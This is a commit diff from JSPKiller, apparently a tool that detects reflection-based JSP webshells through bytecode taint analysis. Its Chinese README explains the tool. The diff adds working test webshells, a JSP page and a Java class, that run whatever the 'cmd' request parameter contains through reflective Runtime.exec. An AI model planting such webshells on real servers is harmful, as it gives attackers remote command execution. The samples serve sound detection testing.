readme

README.md

@@ -1,3 +1,25 @@
 # JSPKiller
 
-查杀各种免杀JSP Webshell
+![](https://img.shields.io/badge/build-passing-brightgreen)
+![](https://img.shields.io/badge/ASM-9.2-blue)
+![](https://img.shields.io/badge/Java-8-red)
+
+## 简介
+
+一个JSP Webshell检测工具
+
+主要是基于污点分析来做，依靠ASM解析字节码，然后模拟栈帧在JVM指令执行中的变化实现数据流分析
+
+具体的原理参考先知社区文章：https://xz.aliyun.com/t/10622
+
+## Quick Start
+
+目前只做了普通反射JSP马的检测，其他方式后续更新
+
+命令：
+
+`java -jar JSPKiller.jar -f 1.jsp`
+
+注意：
+1. `JSPKiller.jar`目录下必须有`lib.jar`文件
+2. 测试的三种反射JSP马已经提供（在JSP目录下）

jsp/test-3.jsp

@@ -0,0 +1,17 @@
+<%@ page language="java" pageEncoding="UTF-8" %>
+<%
+    String cmd = request.getParameter("cmd");
+    Process process = (Process) Class.forName("java.lang.Runtime")
+            .getMethod("exec", String.class)
+            .invoke(Class.forName("java.lang.Runtime")
+                            .getMethod("getRuntime").invoke(null), cmd);
+    java.io.InputStream in = process.getInputStream();
+    out.print("<pre>");
+    java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
+    java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
+    String s = null;
+    while ((s = stdInput.readLine()) != null) {
+        out.println(s);
+    }
+    out.print("</pre>");
+%>

src/main/java/org/sec/Main.java

@@ -95,7 +95,6 @@ private static void start(Command command) {
             ReflectionShellClassVisitor cv = new ReflectionShellClassVisitor();
             cr.accept(cv, ClassReader.EXPAND_FRAMES);
         } catch (Exception e) {
-            e.printStackTrace();
         }
     }
 }

src/main/java/org/sec/config/Webshell.java

@@ -0,0 +1,32 @@
+package org.sec.config;
+
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.PrintWriter;
+
+@SuppressWarnings("unchecked")
+public class Webshell {
+  public static void invoke(
+      HttpServletRequest request, HttpServletResponse response, PrintWriter out) {
+    try {
+
+      String cmd = request.getParameter("cmd");
+      Class rt = Class.forName("java.lang.Runtime");
+      java.lang.reflect.Method gr = rt.getMethod("getRuntime");
+      java.lang.reflect.Method ex = rt.getMethod("exec", String.class);
+      Process process = (Process) ex.invoke(gr.invoke(null), cmd);
+      java.io.InputStream in = process.getInputStream();
+      out.print("<pre>");
+      java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
+      java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
+      String s = null;
+      while ((s = stdInput.readLine()) != null) {
+        out.println(s);
+      }
+      out.print("</pre>");
+
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+}